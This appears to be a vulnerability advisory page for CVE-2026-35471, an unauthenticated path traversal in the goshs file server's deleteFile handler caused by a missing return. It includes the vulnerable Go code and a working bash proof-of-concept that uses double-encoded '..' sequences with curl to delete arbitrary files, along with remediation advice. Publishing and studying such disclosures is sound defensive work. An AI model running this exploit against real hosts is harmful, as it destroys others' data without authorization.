Skip to main content

Suse CVE-2026-35471

CRITICAL
Path Traversal (CWE-22)
2026-04-03 https://github.com/patrickhener/goshs GHSA-6qcc-6q27-whp8
9.8
CVSS 3.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SUSE
CRITICAL
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Analysis Generated
Apr 03, 2026 - 22:15 vuln.today
Patch released
Apr 03, 2026 - 22:15 nvd
Patch available
CVE Published
Apr 03, 2026 - 21:58 nvd
CRITICAL 9.8

DescriptionGitHub Advisory

Summary

  • deleteFile() missing return after path traversal check | httpserver/handler.go:645-671

The finding affects the default configuration, no flags or authentication required.

Details

File: httpserver/handler.go:645-671 Trigger: GET /<path>?delete (handler.go:157-160 dispatches to deleteFile)

The function detects .. in the decoded path but does not return.

go
func (fs *FileServer) deleteFile(w http.ResponseWriter, req *http.Request) {
    upath := filepath.FromSlash(filepath.Clean("/" + strings.Trim(req.URL.Path, "/")))

    fileCleaned, _ := url.QueryUnescape(upath)
    if strings.Contains(fileCleaned, "..") {
        w.WriteHeader(500)
        _, err := w.Write([]byte("Cannot delete file"))
        if err != nil {
            logger.Errorf("error writing answer to client: %+v", err)
        }
        // BUG: no return, falls through to os.RemoveAll
    }

    deletePath := filepath.Join(fs.Webroot, fileCleaned)
    err := os.RemoveAll(deletePath)  // always executes

Root causes: Missing return after the guard makes the check dead code

Impact: Unauthenticated arbitrary file/directory deletion.

PoCs:

bash
#!/usr/bin/env bash
# Delete an arbitrary file/directory on a running goshs instance.
# Usage: ./arbitrary_delete.sh <host> <port> <absolute-path-to-delete>

set -euo pipefail

HOST="${1:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
PORT="${2:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
TARGET="${3:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
# Double-encode ".." => %252e%252e
# We don't know the webroot depth, so use 16 levels (covers most paths).
TRAVERSAL=""
for _ in $(seq 1 16); do
    TRAVERSAL="${TRAVERSAL}%252e%252e/"
done
# Strip leading / from target and URL-encode any special chars
TARGET_REL="${TARGET#/}"
ENCODED_TARGET=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$TARGET_REL', safe='/'))")

URL="http://${HOST}:${PORT}/${TRAVERSAL}${ENCODED_TARGET}?delete"

echo "[*] Target:  ${TARGET}"
echo "[*] Request: GET ${URL}"
echo ""

HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "$URL")

echo "[*] HTTP ${HTTP_CODE}"

To execute it: ./arbitrary_delete.sh 10.1.2.2 8000 /tmp/canary

---

Recommendations

Checking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method return is called after every error response.

AnalysisAI

Unauthenticated arbitrary file deletion in goshs HTTP file server allows remote attackers to delete any file or directory on the host system via path traversal. A missing return statement after input validation enables attackers to bypass the '..' check by double-encoding traversal sequences (e.g., %252e%252e), sending requests to '/<traversal>/<target-path>?delete' to trigger os.RemoveAll on arbitrary filesystem paths. The vulnerability affects the default configuration with no authentication or special flags required. Public exploit code exists with a working proof-of-concept shell script demonstrating the attack. CVSS 9.8 (Critical) reflects network accessibility, no authentication requirement, and complete impact to integrity and availability. Vendor-released patch available via GitHub commit 237f3af.

Technical ContextAI

The vulnerability exists in the goshs Go-based HTTP file server's deleteFile function (httpserver/handler.go:645-671). When handling GET requests with a '?delete' query parameter, the code attempts to sanitize user input by checking for '..' sequences after URL-decoding the path. However, a critical logic error allows execution to fall through to os.RemoveAll even when path traversal is detected. The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) combined with a missing return statement after the validation check. Attackers exploit this by double-encoding traversal sequences (%252e%252e becomes '..' after the first decode layer), bypassing the string-contains check while still achieving directory traversal. The filepath.Join operation concatenates the webroot with the attacker-controlled path, but insufficient traversal depth in the payload allows escaping the webroot boundary. The Go package identifier pkg:go/github.com_patrickhener_goshs confirms this affects the patrickhener/goshs project.

RemediationAI

Upgrade to goshs version containing commit 237f3af891a90df9b903b85f1cd3438040ca261a or later, which addresses the missing return statement and improves path traversal validation. The patch is available at https://github.com/patrickhener/goshs/commit/237f3af891a90df9b903b85f1cd3438040ca261a. Organizations unable to immediately upgrade should disable the delete functionality by blocking HTTP requests containing the '?delete' query parameter at the reverse proxy or firewall level, or restrict goshs network access to trusted administrative networks only. Review filesystem permissions to ensure the goshs process runs with minimal privileges and cannot delete critical system files. Consult the vendor security advisory at https://github.com/patrickhener/goshs/security/advisories/GHSA-6qcc-6q27-whp8 for additional guidance. Audit logs for suspicious DELETE operations or requests containing encoded traversal sequences (%252e patterns) to identify potential exploitation attempts.

Vendor StatusVendor

SUSE

Severity: Critical
Product Status
openSUSE Tumbleweed Fixed

Share

CVE-2026-35471 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy